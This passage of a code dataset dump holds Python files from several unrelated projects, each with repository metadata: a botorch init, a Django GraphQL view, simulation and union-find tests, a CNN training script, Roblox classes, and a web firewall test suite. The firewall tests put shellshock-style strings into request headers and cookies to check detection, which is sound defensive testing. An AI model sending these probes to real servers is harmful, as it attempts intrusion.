        ArchivedHistoryItem,
        ExplanationHistoryItem,
        ImpactHistoryItem,
    )
    default_subclass = GenericHistoryItem
    class_lookup = {}
| 24.675 | 59 | 0.68997 | 85 | 987 | 7.905882 | 0.435294 | 0.089286 | 0.080357 | 0.125 | 0.080357 | 0.080357 | 0.080357 | 0 | 0 | 0 | 0 | 0 | 0.235056 | 987 | 39 | 60 | 25.307692 | 0.890066 | 0 | 0 | 0.068966 | 0 | 0 | 0.171226 | 0.026342 | 0 | 0 | 0 | 0 | 0 | 1 | 0.068966 | false | 0 | 0.068966 | 0 | 0.758621 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
c727467c9c5f9cbcf49804ff4103bf27f2140c3f | 1,504 | py | Python | botorch/acquisition/__init__.py | jmren168/botorch | 6c067185f56d3a244c4093393b8a97388fb1c0b3 | [
"MIT"
] | 1 | 2020-03-29T20:06:45.000Z | 2020-03-29T20:06:45.000Z | botorch/acquisition/__init__.py | jmren168/botorch | 6c067185f56d3a244c4093393b8a97388fb1c0b3 | [
"MIT"
] | null | null | null | botorch/acquisition/__init__.py | jmren168/botorch | 6c067185f56d3a244c4093393b8a97388fb1c0b3 | [
"MIT"
] | 1 | 2020-03-29T20:06:48.000Z | 2020-03-29T20:06:48.000Z | #!/usr/bin/env python3
# Copyright (c) Facebook, Inc. and its affiliates. All Rights Reserved
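# Package re-exports: the names imported below (and listed in __all__) make up
# the public botorch.acquisition API.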
from .acquisition import AcquisitionFunction
from .analytic import (
    AnalyticAcquisitionFunction,
    ConstrainedExpectedImprovement,
    ExpectedImprovement,
    NoisyExpectedImprovement,
    PosteriorMean,
    ProbabilityOfImprovement,
    UpperConfidenceBound,
)
from .fixed_feature import FixedFeatureAcquisitionFunction
from .monte_carlo import (
    MCAcquisitionFunction,
    qExpectedImprovement,
    qNoisyExpectedImprovement,
    qProbabilityOfImprovement,
    qSimpleRegret,
    qUpperConfidenceBound,
)
from .objective import (
    ConstrainedMCObjective,
    GenericMCObjective,
    IdentityMCObjective,
    LinearMCObjective,
    MCAcquisitionObjective,
    ScalarizedObjective,
)
from .utils import get_acquisition_function


__all__ = [
    "AcquisitionFunction",
    "AnalyticAcquisitionFunction",
    "ConstrainedExpectedImprovement",
    "ExpectedImprovement",
    "FixedFeatureAcquisitionFunction",
    "NoisyExpectedImprovement",
    "PosteriorMean",
    "ProbabilityOfImprovement",
    "UpperConfidenceBound",
    "qExpectedImprovement",
    "qNoisyExpectedImprovement",
    "qProbabilityOfImprovement",
    "qSimpleRegret",
    "qUpperConfidenceBound",
    "ConstrainedMCObjective",
    "GenericMCObjective",
    "IdentityMCObjective",
    "LinearMCObjective",
    "MCAcquisitionFunction",
    "MCAcquisitionObjective",
    "ScalarizedObjective",
    "get_acquisition_function",
]
| 25.491525 | 70 | 0.757979 | 83 | 1,504 | 13.614458 | 0.566265 | 0.100885 | 0.134513 | 0.143363 | 0.184071 | 0 | 0 | 0 | 0 | 0 | 0 | 0.000799 | 0.168218 | 1,504 | 58 | 71 | 25.931034 | 0.902478 | 0.05984 | 0 | 0 | 0 | 0 | 0.334986 | 0.209632 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.115385 | 0 | 0.115385 | 0 | 0 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
c72d167470fc1e484c9ed6ee92db56b541a26d0c | 3,216 | py | Python | edivorce/apps/core/views/graphql.py | gerritvdm/eDivorce | e3c0a4037a7141769250b96df6cc4eb4ea5ef3af | [
"Apache-2.0"
] | 6 | 2017-03-24T18:20:33.000Z | 2021-01-29T03:25:07.000Z | edivorce/apps/core/views/graphql.py | gerritvdm/eDivorce | e3c0a4037a7141769250b96df6cc4eb4ea5ef3af | [
"Apache-2.0"
] | 13 | 2018-10-12T17:20:37.000Z | 2021-11-05T23:13:21.000Z | edivorce/apps/core/views/graphql.py | gerritvdm/eDivorce | e3c0a4037a7141769250b96df6cc4eb4ea5ef3af | [
"Apache-2.0"
] | 11 | 2017-03-15T12:36:39.000Z | 2021-03-05T14:35:59.000Z | import graphene
import graphene_django
from django.http import HttpResponseForbidden
from graphene_django.views import GraphQLView
from graphql import GraphQLError
from edivorce.apps.core.models import Document
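# GraphQL layer for user-uploaded documents: a login-gated view, a read query
# that prunes records whose files have gone missing, and a mutation that
# updates per-page ordering/rotation metadata.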
class PrivateGraphQLView(GraphQLView):
    def dispatch(self, request, *args, **kwargs):
        if not request.user.is_authenticated:
            return HttpResponseForbidden()
        return super().dispatch(request, *args, **kwargs)


class DocumentType(graphene_django.DjangoObjectType):
    file_url = graphene.String(source='get_file_url')
    content_type = graphene.String(source='get_content_type')

    class Meta:
        model = Document
        exclude = ('id', 'file')
class Query(graphene.ObjectType):
    documents = graphene.List(DocumentType, doc_type=graphene.String(required=True), party_code=graphene.Int(required=True))

    def resolve_documents(self, info, **kwargs):
        if info.context.user.is_anonymous:
            raise GraphQLError('Unauthorized')
        q = Document.objects.filter(bceid_user=info.context.user, **kwargs)
        for doc in q:
            if not doc.file_exists():
                q.delete()
                return Document.objects.none()
        return q
class DocumentInput(graphene.InputObjectType):
    filename = graphene.String(required=True)
    size = graphene.Int(required=True)
    width = graphene.Int()
    height = graphene.Int()
    rotation = graphene.Int()


class DocumentMetaDataInput(graphene.InputObjectType):
    files = graphene.List(DocumentInput, required=True)
    doc_type = graphene.String(required=True)
    party_code = graphene.Int(required=True)


class UpdateMetadata(graphene.Mutation):
    class Arguments:
        input = DocumentMetaDataInput(required=True)

    documents = graphene.List(DocumentType)
    def mutate(self, info, **kwargs):
        input_ = kwargs['input']
        documents = Document.objects.filter(bceid_user=info.context.user, doc_type=input_['doc_type'], party_code=input_['party_code'])
        unique_files = [dict(s) for s in set(frozenset(d.items()) for d in input_['files'])]
        if documents.count() != len(input_['files']) or documents.count() != len(unique_files):
            raise GraphQLError("Invalid input: there must be the same number of files")
        for i, file in enumerate(input_['files']):
            try:
                doc = documents.get(filename=file['filename'], size=file['size'])
                doc.sort_order = i + 1
                doc.width = file.get('width', doc.width)
                doc.height = file.get('height', doc.height)
                doc.rotation = file.get('rotation', doc.rotation)
                if doc.rotation not in [0, 90, 180, 270]:
                    raise GraphQLError(f"Invalid rotation {doc.rotation}, must be 0, 90, 180, 270")
                doc.save()
            except Document.DoesNotExist:
                raise GraphQLError(f"Couldn't find document '{file['filename']}' with size '{file['size']}'")
        return UpdateMetadata(documents=documents.all())


class Mutations(graphene.ObjectType):
    update_metadata = UpdateMetadata.Field()
graphql_schema = graphene.Schema(query=Query, mutation=Mutations)
| 36.545455 | 135 | 0.668221 | 370 | 3,216 | 5.716216 | 0.335135 | 0.04539 | 0.025532 | 0.036879 | 0.104019 | 0.104019 | 0.104019 | 0.104019 | 0.061466 | 0.061466 | 0 | 0.007549 | 0.217351 | 3,216 | 87 | 136 | 36.965517 | 0.832737 | 0 | 0 | 0 | 0 | 0 | 0.091418 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.046875 | false | 0 | 0.09375 | 0 | 0.5625 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
c73caaa0e2719e60ad785aecaaee84cf63518c02 | 1,497 | py | Python | tests/test_path_choice.py | jataware/flee | 67c00c4572e71dd2bbfb390d7d7ede13ffb9594e | [
"BSD-3-Clause"
] | 3 | 2021-05-24T14:07:48.000Z | 2022-01-10T03:20:36.000Z | tests/test_path_choice.py | jataware/flee | 67c00c4572e71dd2bbfb390d7d7ede13ffb9594e | [
"BSD-3-Clause"
] | 15 | 2020-06-05T11:42:23.000Z | 2022-03-09T20:17:29.000Z | tests/test_path_choice.py | jataware/flee | 67c00c4572e71dd2bbfb390d7d7ede13ffb9594e | [
"BSD-3-Clause"
] | 3 | 2020-05-29T15:10:28.000Z | 2022-03-09T19:51:41.000Z | from flee import flee
"""
Generation 1 code. Incorporates only distance, travel always takes one day.
"""
def test_path_choice():
    print("Testing basic data handling and simulation kernel.")

    flee.SimulationSettings.MinMoveSpeed = 5000.0
    flee.SimulationSettings.MaxMoveSpeed = 5000.0
    flee.SimulationSettings.MaxWalkSpeed = 5000.0

    e = flee.Ecosystem()

    l1 = e.addLocation(name="A", movechance=1.0)
    _ = e.addLocation(name="B", movechance=1.0)
    _ = e.addLocation(name="C1", movechance=1.0)
    _ = e.addLocation(name="C2", movechance=1.0)
    _ = e.addLocation(name="D1", movechance=1.0)
    _ = e.addLocation(name="D2", movechance=1.0)
    _ = e.addLocation(name="D3", movechance=1.0)
    # l2 = e.addLocation(name="B", movechance=1.0)
    # l3 = e.addLocation(name="C1", movechance=1.0)
    # l4 = e.addLocation(name="C2", movechance=1.0)
    # l5 = e.addLocation(name="D1", movechance=1.0)
    # l6 = e.addLocation(name="D2", movechance=1.0)
    # l7 = e.addLocation(name="D3", movechance=1.0)

    e.linkUp(endpoint1="A", endpoint2="B", distance=10.0)
    e.linkUp(endpoint1="A", endpoint2="C1", distance=10.0)
    e.linkUp(endpoint1="A", endpoint2="D1", distance=10.0)
    e.linkUp(endpoint1="C1", endpoint2="C2", distance=10.0)
    e.linkUp(endpoint1="D1", endpoint2="D2", distance=10.0)
    e.linkUp(endpoint1="D2", endpoint2="D3", distance=10.0)

    e.addAgent(location=l1)

    print("Test successful!")


if __name__ == "__main__":
    test_path_choice()
| 33.266667 | 75 | 0.663327 | 210 | 1,497 | 4.642857 | 0.285714 | 0.028718 | 0.213333 | 0.093333 | 0.565128 | 0.565128 | 0.443077 | 0.075897 | 0 | 0 | 0 | 0.078025 | 0.160989 | 1,497 | 44 | 76 | 34.022727 | 0.698248 | 0.183033 | 0 | 0 | 0 | 0 | 0.093557 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.041667 | false | 0 | 0.041667 | 0 | 0.083333 | 0.083333 | 0 | 0 | 0 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
c746b2ee9cd86b479c95bc6e51b1c40a08b1d7da | 2,162 | py | Python | algorithms/tests/test_unionfind.py | tommyod/PythonAlgorithms | f0a0f67be069fc9e9fa3027ed83942d6401223fe | [
"MIT"
] | 1 | 2021-08-23T17:15:06.000Z | 2021-08-23T17:15:06.000Z | algorithms/tests/test_unionfind.py | tommyod/PythonAlgorithms | f0a0f67be069fc9e9fa3027ed83942d6401223fe | [
"MIT"
] | 1 | 2018-05-02T17:29:42.000Z | 2018-05-02T17:31:18.000Z | algorithms/tests/test_unionfind.py | tommyod/PythonAlgorithms | f0a0f67be069fc9e9fa3027ed83942d6401223fe | [
"MIT"
] | 1 | 2018-05-02T12:31:52.000Z | 2018-05-02T12:31:52.000Z | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Tests for the union find data structure.
"""
try:
    from ..unionfind import UnionFind
except ValueError:
    pass


def test_unionfind_basics():
    """
    Test the basic properties of unionfind.
    """
    u = UnionFind([1, 2, 3])
    assert u.in_same_set(1, 2) is False
    assert u.in_same_set(2, 3) is False
    u.union(1, 3)
    assert u.in_same_set(1, 2) is False
    assert u.in_same_set(3, 1)
    assert u.get_root(1) == u.get_root(3)


def test_unionfind_adding_elements():
    """
    Test adding operations, mostly syntactic sugar.
    """
    u = UnionFind([1, 2])
    u.add(['a', 'b'])
    assert 1 in u
    assert 'a' in u


def test_unionfind_example():
    """
    Test on a slightly more involved example.
    """
    u = UnionFind([1, 2, 3, 4, 5])
    u.union(1, 3)
    u.union(2, 4)
    assert u.in_same_set(1, 3)
    assert u.in_same_set(4, 2)
    assert not u.in_same_set(2, 5)
    assert not u.in_same_set(2, 1)
    assert not u.in_same_set(1, 4)
    u.union(5, 1)
    assert u.in_same_set(3, 5)


def test_unionfind_several():
    """
    Test that we can take union of more than two elements.
    """
    u = UnionFind([1, 2, 3, 4, 5, 6, 7, 8])
    u.union([1, 2, 3])
    u.union([4, 5, 6])
    u.union([7, 8])
    assert u.in_same_set(1, 3)
    assert u.in_same_set(6, 4)
    assert u.in_same_set(7, 8)
    assert not u.in_same_set(2, 5)
    assert not u.in_same_set(4, 8)


def test_unionfind_compression():
    """
    Test path compression and the union by rank.
    """
    # Test the ranking
    elements = list(range(100))
    u = UnionFind(elements)
    for i in range(len(elements) - 1):
        u.union(elements[i], elements[i + 1])
    assert max(u._rank.values()) == 1

    # Test path compression
    parent_nodes = list(u._parent.values())
    assert all(parent == parent_nodes[0] for parent in parent_nodes)


if __name__ == "__main__":
    import pytest

    # --durations=10 <- May be used to show potentially slow tests
    pytest.main(args=['.', '--doctest-modules', '-v'])
c7477304b232543e959b4e41d7f4db3d8d55814b | 334 | py | Python | products/migrations/0010_remove_product_updated_at.py | UB-ES-2021-A1/wannasell-backend | 84360b2985fc28971867601373697f39303e396b | [
"Unlicense"
] | null | null | null | products/migrations/0010_remove_product_updated_at.py | UB-ES-2021-A1/wannasell-backend | 84360b2985fc28971867601373697f39303e396b | [
"Unlicense"
] | 62 | 2021-11-22T21:52:44.000Z | 2021-12-17T15:07:02.000Z | products/migrations/0010_remove_product_updated_at.py | UB-ES-2021-A1/wannasell-backend | 84360b2985fc28971867601373697f39303e396b | [
"Unlicense"
] | null | null | null | # Generated by Django 3.2.8 on 2021-11-25 17:50
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('products', '0009_auto_20211125_1846'),
]
operations = [
migrations.RemoveField(
model_name='product',
name='updated_at',
),
]
| 18.555556 | 48 | 0.598802 | 36 | 334 | 5.416667 | 0.861111 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.130802 | 0.290419 | 334 | 17 | 49 | 19.647059 | 0.691983 | 0.134731 | 0 | 0 | 1 | 0 | 0.167247 | 0.080139 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.090909 | 0 | 0.363636 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
c7511256bf0b0f8d7c0f1ccc084e2e9144ad8ab3 | 2,948 | py | Python | sample_architectures/cnn.py | hvarS/PyTorch-Refer | 020445e3ae1f3627f39e1ab957cdff44a2127289 | [
"MIT"
] | null | null | null | sample_architectures/cnn.py | hvarS/PyTorch-Refer | 020445e3ae1f3627f39e1ab957cdff44a2127289 | [
"MIT"
] | null | null | null | sample_architectures/cnn.py | hvarS/PyTorch-Refer | 020445e3ae1f3627f39e1ab957cdff44a2127289 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
"""CNN.ipynb
Automatically generated by Colaboratory.
Original file is located at
https://colab.research.google.com/drive/1Tq6HUya2PrC0SmyOIFo2c_eVtguRED2q
"""
import torch
import torch.nn as nn
import torch.optim as optim
import torch.nn.functional as F
from torch.utils.data import DataLoader
import torchvision.datasets as datasets
import torchvision.transforms as transforms
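# Two conv+pool blocks shrink 28x28 MNIST digits to a 16x7x7 feature map,
# which a single linear layer maps to the 10 class scores.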
class CNN(nn.Module):
    def __init__(self, in_channels=1, num_classes=10):
        super(CNN, self).__init__()
        self.conv1 = nn.Conv2d(in_channels=in_channels, out_channels=8, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1))
        self.pool1 = nn.MaxPool2d(kernel_size=(2, 2), stride=(2, 2))
        self.conv2 = nn.Conv2d(in_channels=8, out_channels=16, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1))
        self.pool2 = nn.MaxPool2d(kernel_size=(2, 2), stride=(2, 2))
        self.fc1 = nn.Linear(16 * 7 * 7, num_classes)

    def forward(self, x):
        x = F.relu(self.conv1(x))
        x = self.pool1(x)
        x = F.relu(self.conv2(x))
        x = self.pool2(x)
        x = x.reshape(x.shape[0], -1)
        x = self.fc1(x)
        return x
model = CNN(1,10)
x = torch.randn((64,1,28,28))
print(model(x).shape)
device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
in_channels = 1
num_classes = 10
learning_rate = 0.001
batch_size = 64
num_epochs = 4
train_dataset = datasets.MNIST(root = "dataset/",train = True,transform = transforms.ToTensor(),download = True)
train_loader = DataLoader(dataset=train_dataset,batch_size=64,shuffle=True)
test_dataset = datasets.MNIST(root="dataset/", train=False, transform=transforms.ToTensor(), download=True)
test_loader = DataLoader(dataset = test_dataset,batch_size = batch_size,shuffle = True)
model = CNN(1,10).to(device = device)
criterion = nn.CrossEntropyLoss()
optimizer = optim.Adam(model.parameters(),lr = learning_rate)
for epoch in range(num_epochs):
    for batch_idx, (data, targets) in enumerate(train_loader):
        # get data to the chosen device if possible
        data = data.to(device=device)
        targets = targets.to(device=device)

        scores = model(data)
        loss = criterion(scores, targets)

        # backward
        optimizer.zero_grad()
        loss.backward()

        # gradient_descent or adam-step
        optimizer.step()
# Check the accuracy for the training step
def check_accuracy(loader, model):
    if loader.dataset.train:
        print("Checking accuracy on training data")
    else:
        print("Checking accuracy on test data")
    num_correct = 0
    num_samples = 0
    model.eval()

    with torch.no_grad():
        for x, y in loader:
            x = x.to(device=device)
            y = y.to(device=device)

            scores = model(x)
            _, predictions = scores.max(1)
            num_correct += (predictions == y).sum()
            num_samples += predictions.size(0)

        print(f' Got {num_correct}/{num_samples} with accuracy ={float(num_correct)/float(num_samples)*100:.2f} ')

    model.train()
check_accuracy(train_loader,model)
check_accuracy(test_loader,model)
| 28.07619 | 128 | 0.700136 | 439 | 2,948 | 4.569476 | 0.328018 | 0.006979 | 0.012961 | 0.013958 | 0.181456 | 0.131605 | 0.108674 | 0.067797 | 0.067797 | 0.067797 | 0 | 0.035251 | 0.162822 | 2,948 | 104 | 129 | 28.346154 | 0.777553 | 0.097693 | 0 | 0 | 1 | 0.014493 | 0.069109 | 0.028323 | 0 | 0 | 0 | 0 | 0 | 1 | 0.043478 | false | 0 | 0.101449 | 0 | 0.173913 | 0.057971 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
c75c60f75fce7285b991ad22486e1b1b13a02fed | 1,990 | py | Python | roblox/partials/partialgroup.py | speer-kinjo/ro.py | 2d5b80aec8fd143b11101fbbfdf3b557f798a27f | [
"MIT"
] | 28 | 2021-11-04T11:13:38.000Z | 2022-03-11T05:00:16.000Z | roblox/partials/partialgroup.py | speer-kinjo/ro.py | 2d5b80aec8fd143b11101fbbfdf3b557f798a27f | [
"MIT"
] | 12 | 2021-11-24T06:25:24.000Z | 2022-03-18T14:37:01.000Z | roblox/partials/partialgroup.py | speer-kinjo/ro.py | 2d5b80aec8fd143b11101fbbfdf3b557f798a27f | [
"MIT"
] | 21 | 2021-10-20T16:36:55.000Z | 2022-03-27T21:43:53.000Z | """
This file contains partial objects related to Roblox groups.
"""
from __future__ import annotations
from typing import TYPE_CHECKING
from ..bases.basegroup import BaseGroup
from ..bases.baseuser import BaseUser
if TYPE_CHECKING:
    from ..client import Client
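# Both partials parse only the fields present in the parent API response and
# initialize BaseGroup with the parsed id via super().__init__(client, self.id).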
class AssetPartialGroup(BaseGroup):
    """
    Represents a partial group in the context of a Roblox asset.
    Intended to parse the `data[0]["creator"]` data from https://games.roblox.com/v1/games.

    Attributes:
        _client: The Client object, which is passed to all objects this Client generates.
        id: The group's ID.
        creator: The group's owner.
        name: The group's name.
    """

    def __init__(self, client: Client, data: dict):
        """
        Arguments:
            client: The Client.
            data: The data from the endpoint.
        """
        self._client: Client = client

        self.creator: BaseUser = BaseUser(client=client, user_id=data["Id"])
        self.id: int = data["CreatorTargetId"]
        self.name: str = data["Name"]

        super().__init__(client, self.id)

    def __repr__(self):
        return f"<{self.__class__.__name__} id={self.id} name={self.name!r}>"
class UniversePartialGroup(BaseGroup):
    """
    Represents a partial group in the context of a Roblox universe.

    Attributes:
        _data: The data we get back from the endpoint.
        _client: The client object, which is passed to all objects this client generates.
        id: Id of the group
        name: Name of the group
    """

    def __init__(self, client: Client, data: dict):
        """
        Arguments:
            client: The ClientSharedObject.
            data: The data from the endpoint.
        """
        self._client: Client = client

        self.id = data["id"]
        self.name: str = data["name"]

        super().__init__(client, self.id)

    def __repr__(self):
        return f"<{self.__class__.__name__} id={self.id} name={self.name!r}>"
| 28.028169 | 91 | 0.628643 | 251 | 1,990 | 4.776892 | 0.286853 | 0.070058 | 0.053378 | 0.045038 | 0.522102 | 0.522102 | 0.522102 | 0.522102 | 0.522102 | 0.522102 | 0 | 0.001371 | 0.266834 | 1,990 | 70 | 92 | 28.428571 | 0.820425 | 0.411055 | 0 | 0.434783 | 0 | 0.086957 | 0.143564 | 0.051485 | 0 | 0 | 0 | 0 | 0 | 1 | 0.173913 | false | 0 | 0.217391 | 0.086957 | 0.565217 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
c75e39b34cd2c6335e68141ae306111fa4b684be | 10,238 | py | Python | tests/blackbox/access_settings/test_bb_access_settings.py | csanders-git/waflz | ec8fc7c845f20a2a8c757d13845ba22a6d7c5b28 | [
"Apache-2.0"
] | 1 | 2019-03-16T09:02:58.000Z | 2019-03-16T09:02:58.000Z | tests/blackbox/access_settings/test_bb_access_settings.py | csanders-git/waflz | ec8fc7c845f20a2a8c757d13845ba22a6d7c5b28 | [
"Apache-2.0"
] | null | null | null | tests/blackbox/access_settings/test_bb_access_settings.py | csanders-git/waflz | ec8fc7c845f20a2a8c757d13845ba22a6d7c5b28 | [
"Apache-2.0"
] | 1 | 2021-04-22T09:43:46.000Z | 2021-04-22T09:43:46.000Z | #!/usr/bin/python
'''Test WAF Access settings'''
#TODO: make so waflz_server only runs once and then can post to it
# ------------------------------------------------------------------------------
# Imports
# ------------------------------------------------------------------------------
import pytest
import subprocess
import os
import sys
import json
from pprint import pprint
import time
import requests
# ------------------------------------------------------------------------------
# Constants
# ------------------------------------------------------------------------------
G_TEST_HOST = 'http://127.0.0.1:12345/'
# ------------------------------------------------------------------------------
# globals
# ------------------------------------------------------------------------------
g_server_pid = -1
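# Each test below sends a crafted request to a local waflz_server (launched by
# the setup_func fixture) and asserts on the JSON event the WAF returns; the
# final test calls teardown_func() to kill the server process.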
# ------------------------------------------------------------------------------
#
# ------------------------------------------------------------------------------
def run_command(command):
    p = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
    stdout, stderr = p.communicate()
    return (p.returncode, stdout, stderr)
# ------------------------------------------------------------------------------
#setup_func
# ------------------------------------------------------------------------------
@pytest.fixture()
def setup_func():
    global g_server_pid
    l_cwd = os.getcwd()
    l_file_path = os.path.dirname(os.path.abspath(__file__))
    l_ruleset_path = os.path.realpath(os.path.join(l_file_path, '../../data/waf/ruleset'))
    l_geoip2city_path = os.path.realpath(os.path.join(l_file_path, '../../data/waf/db/GeoLite2-City.mmdb'))
    l_geoip2ISP_path = os.path.realpath(os.path.join(l_file_path, '../../data/waf/db/GeoLite2-ASN.mmdb'))
    l_profile_path = os.path.realpath(os.path.join(l_file_path, 'test_bb_access_settings.waf.prof.json'))
    l_waflz_server_path = os.path.abspath(os.path.join(l_file_path, '../../../build/util/waflz_server/waflz_server'))
    l_subproc = subprocess.Popen([l_waflz_server_path,
                                  '-f', l_profile_path,
                                  '-r', l_ruleset_path,
                                  '-g', l_geoip2city_path,
                                  '-s', l_geoip2ISP_path])
    time.sleep(1)
    g_server_pid = l_subproc.pid
    time.sleep(1)
    print 'setup g_server_pid: %d'%(g_server_pid)
    time.sleep(1)
# ------------------------------------------------------------------------------
#teardown_func
# ------------------------------------------------------------------------------
def teardown_func():
    global g_server_pid
    time.sleep(.5)
    print 'teardown g_server_pid: %d'%(g_server_pid)
    if g_server_pid != -1:
        l_code, l_out, l_err = run_command('kill -9 %d'%(g_server_pid))
        time.sleep(.5)
# ------------------------------------------------------------------------------
# test_bb_modsecurity_ec_access_settings_ignore_args
# ------------------------------------------------------------------------------
def test_bb_modsec_ec_access_settings_01_block_not_in_ignore_args(setup_func):
    #"ignore_query_args": ["ignore", "this", "crap"]
    l_uri = G_TEST_HOST + '?' + 'arg1&arg2&arg3&arg4&arg5'
    l_headers = {"host": "myhost.com"}
    l_r = requests.get(l_uri, headers=l_headers)
    assert l_r.status_code == 200
    l_r_json = l_r.json()
    assert len(l_r_json) > 0
    print json.dumps(l_r_json, indent=4)
    assert l_r_json['rule_intercept_status'] == 403
    #assert 'modsecurity_crs_23_request_limits.conf' in l_r_json['sub_event'][0]['rule_file']
    # ensure 403 because exceeded max_num_args
    assert 'Too many arguments in' in l_r_json['rule_msg']
# ------------------------------------------------------------------------------
# test_bb_modsec_ec_access_settings_02_bypass_in_ignore_args
# ------------------------------------------------------------------------------
def test_bb_modsec_ec_access_settings_02_bypass_in_ignore_args():
    # Test that passing ignore args lets it bypass
    # Max arg limit is 4, we pass 7
    l_uri = G_TEST_HOST + '?' + 'arg1&arg2&arg3&arg4&ignore&this&crap'
    l_headers = {"host": "myhost.com"}
    l_r = requests.get(l_uri, headers=l_headers)
    assert l_r.status_code == 200
    l_r_json = l_r.json()
    assert len(l_r_json) == 0
# ------------------------------------------------------------------------------
# test_bb_modsec_ec_access_settings_03_block_headers_not_in_ignore_header_list
# ------------------------------------------------------------------------------
def test_bb_modsec_ec_access_settings_03_block_headers_not_in_ignore_header_list():
    #"ignore_header": ["(?i)(benign-header)", "super-whatever-header", "^D.*"]
    l_uri = G_TEST_HOST
    l_headers = {"host": "myhost.com",
                 "kooky-Header": "function () { doing this is kinda dumb"
                 }
    l_r = requests.get(l_uri, headers=l_headers)
    assert l_r.status_code == 200
    l_r_json = l_r.json()
    print l_r_json
    # We got an event
    assert len(l_r_json) > 0
    # detect a bash shellshock
    assert 'Bash shellshock attack detected' in l_r_json['sub_event'][0]['rule_msg']
    assert 'REQUEST_HEADERS' in l_r_json['sub_event'][0]['matched_var']['name']
    assert 'ZnVuY3Rpb24gKCkgeyBkb2luZyB0aGlzIGlzIGtpbmRhIGR1bWI=' in l_r_json['sub_event'][0]['matched_var']['value']
# ------------------------------------------------------------------------------
# test_bb_modsec_ec_access_settings_04_bypass_headers_in_ignore_header_list
# ------------------------------------------------------------------------------
def test_bb_modsec_ec_access_settings_04_bypass_headers_in_ignore_header_list():
    # Test ignore headers are ignored
    l_uri = G_TEST_HOST
    l_headers = {"host": "myhost.com",
                 "Benign-Header": "function () { doing this is kinda dumb",
                 "super-whatever-header": "function () { doing this is kinda dumb"
                 }
    l_r = requests.get(l_uri, headers=l_headers)
    assert l_r.status_code == 200
    l_r_json = l_r.json()
    assert len(l_r_json) == 0
# -------------------------------------------------------------------------------
# test_bb_modsec_ec_access_settings_05_bypass_headers_in_ignore_header_list_regex
# -------------------------------------------------------------------------------
def test_bb_modsec_ec_access_settings_05_bypass_headers_in_ignore_header_list_regex():
    ########################################
    # Test regex "^D.*"
    ########################################
    l_uri = G_TEST_HOST
    # anything that starts with D should be ignored
    l_headers = {"host": "myhost.com",
                 "Doopdoop": "function () { doing this is kinda dumb",
                 "Duper-duper-deader": "function () { doing this is kinda dumb"
                 }
    l_r = requests.get(l_uri, headers=l_headers)
    assert l_r.status_code == 200
    l_r_json = l_r.json()
    assert len(l_r_json) == 0
# ------------------------------------------------------------------------------
# test_bb_modsec_ec_access_settings_06_block_cookie_not_in_ignore_cookie_list
# ------------------------------------------------------------------------------
def test_bb_modsec_ec_access_settings_06_block_cookie_not_in_ignore_cookie_list():
    #"ignore_cookie": ["(?i)(sketchy_origin)", "(?i)(yousocrazy)"]
    l_uri = G_TEST_HOST
    l_headers = {"host": "myhost.com",
                 "Cookie": "blahblah=function () { asdf asdf asdf"
                 }
    l_r = requests.get(l_uri, headers=l_headers)
    assert l_r.status_code == 200
    l_r_json = l_r.json()
    assert len(l_r_json) > 0
    # detect a bash shellshock
    assert 'Bash shellshock attack detected' in l_r_json['sub_event'][0]['rule_msg']
    assert 'REQUEST_HEADERS' in l_r_json['sub_event'][0]['matched_var']['name']
# ------------------------------------------------------------------------------
# test_bb_modsec_ec_access_settings_07_bypass_cookie_in_ignore_cookie_list
# ------------------------------------------------------------------------------
def test_bb_modsec_ec_access_settings_07_bypass_cookie_in_ignore_cookie_list():
